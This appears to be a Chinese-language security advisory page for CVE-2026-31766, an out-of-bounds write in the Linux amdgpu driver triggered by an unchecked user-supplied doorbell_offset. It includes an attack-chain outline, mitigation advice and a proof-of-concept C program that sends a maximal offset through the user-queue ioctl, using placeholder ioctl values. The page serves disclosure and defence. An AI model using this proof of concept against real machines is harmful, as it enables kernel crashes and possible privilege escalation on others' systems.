CVE-2026-31766 CVSS 7.1 高危

CVE-2026-31766 Linux内核amdgpu驱动内存破坏漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31766

漏洞类型

内存破坏

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核

漏洞概述

Linux内核的drm/amdgpu驱动在用户队列创建过程中存在漏洞。由于未对用户提供的doorbell_offset进行边界检查，攻击者可利用超大偏移量导致越界写入，进而破坏内核门铃空间。

技术细节

该漏洞位于Linux内核的amdgpu驱动模块，具体涉及`amdgpu_userq_get_doorbell_index()`函数。该函数在处理用户队列创建请求时，直接将用户空间传入的`doorbell_offset`参数传递给`amdgpu_doorbell_index_on_bar()`函数进行BAR索引计算，且未验证该偏移量是否在已分配的doorbell BO（缓冲区对象）范围内。攻击者可通过构造特制的输入数据，传入一个任意大的`doorbell_offset`值。这将导致计算出的门铃索引超出合法内存区域，引发越界写入操作，破坏内核门铃空间。由于使用的是普通算术运算，可能还涉及整数溢出问题。该漏洞需要本地低权限即可触发，成功利用可能导致内核崩溃（DoS）或潜在的权限提升。

攻击链分析

STEP 1

步骤1

攻击者获得本地系统的低权限用户访问权限。

STEP 2

步骤2

攻击者准备恶意输入数据，将doorbell_offset设置为超出doorbell BO范围的极大值。

STEP 3

步骤3

攻击者利用用户队列创建接口，调用amdgpu驱动的相关功能。

STEP 4

步骤4

驱动程序在未校验的情况下计算索引，导致越界写入内核门铃空间。

STEP 5

步骤5

触发内核内存损坏，导致系统崩溃或潜在的完整性破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Mock definitions for PoC demonstration
#define DRM_IOCTL_AMDGPU_USERQ_CREATE 0x00 // Placeholder for actual IOCTL code

struct drm_amdgpu_userq_create {
    __u64 doorbell_offset;
    __u64 queue_size;
    // ... other fields
};

int main() {
    int fd = open("/dev/dri/renderD128", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    struct drm_amdgpu_userq_create args = {0};
    // Set a maliciously large doorbell_offset to trigger OOB write
    args.doorbell_offset = 0xFFFFFFFFFFFFFFFF; 

    // This IOCTL triggers the vulnerable path
    if (ioctl(fd, DRM_IOCTL_AMDGPU_USERQ_CREATE, &args) == -1) {
        perror("IOCTL failed");
        close(fd);
        return 1;
    }

    close(fd);
    return 0;
}

影响范围

Linux内核 (受影响的稳定分支)

防御指南

临时缓解措施

建议立即更新Linux内核至修复版本。在无法立即更新的情况下，可通过限制本地用户对图形设备的访问权限（如修改/dev/dri/设备文件的权限）来降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表